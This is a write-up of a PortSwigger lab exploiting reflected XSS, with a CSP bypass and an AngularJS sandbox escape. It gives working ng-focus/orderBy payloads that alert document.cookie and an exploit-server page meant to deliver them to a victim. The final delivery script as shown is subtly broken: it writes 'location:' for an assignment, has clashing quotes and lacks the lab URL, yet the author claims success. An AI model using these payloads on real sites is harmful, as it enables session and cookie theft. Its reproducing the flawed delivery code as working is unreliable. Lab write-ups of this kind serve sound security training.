Reflected XSS with AngularJS sandbox escape and CSP

Description

This lab uses CSP and AngularJS.

To solve the lab, perform a cross-site scripting attack that bypasses CSP, escapes the AngularJS sandbox, and alerts document.cookie.

Approach

After accessing the lab, I intercepted the search request and sent it to the Burp Suite repeater for analysis:

GET /?search=ichyaboy HTTP/2
Host: 0a5d00b70482d3d2819a4dd800ac00ee.web-security-academy.net
Cookie: session=fuvH1hqf09Ga0CiIwWJksQfVcZN6ki0S
...

In the response, I noticed that my input was being reflected. However, standard XSS payloads wouldn't work due to the web application's Content Security Policy (CSP) and the presence of a sandbox. Therefore, I decided to test some AngularJS CSP bypass payloads from the XSS cheatsheet by PortSwigger.

First, I tried injecting this payload:

<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

But I encountered an error:

Search term cannot exceed 80 characters

This indicated that my payload couldn't exceed 80 characters in length. I moved to a shorter payload:

<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'>

To meet the lab's requirement of alerting document.cookie, I modified the payload. Additionally, since the ng-focus attribute requires the input to be focused, and this payload lacked the autofocus attribute, I needed to manually focus on the input tag.

Here is the modified payload:

<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'>

now this payload hopefully going to work so i will go to the exploit server where iw ill be hosting my malicious HTML page which will be having my final payload so whenever the victim visits it the exploit gets triggered.

Building the malicious html page payload:

<script>
location:'<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'>'
</script>

To trigger the exploit, I used the exploit server to host a malicious HTML page containing the payload. When the victim visits this page, they will be redirected to the lab page with the AngularJS CSP bypass payload, which will trigger the XSS.

Here's the HTML page with the payload with the #x at the end of the URL which focuses on the input tag with the id of x, triggering the ng-focus event.:

<script>
location:'<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'>#x'
</script>

To ensure the payload is properly handled, I URL-encoded it:

<script>
location:'%3cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3e#x'
</script>

Finally, I stored the HTML page code on the exploit server and delivered it to the victim by pressing the "Deliver exploit to victim" button. This successfully bypassed the CSP, triggered the XSS, and solved the lab.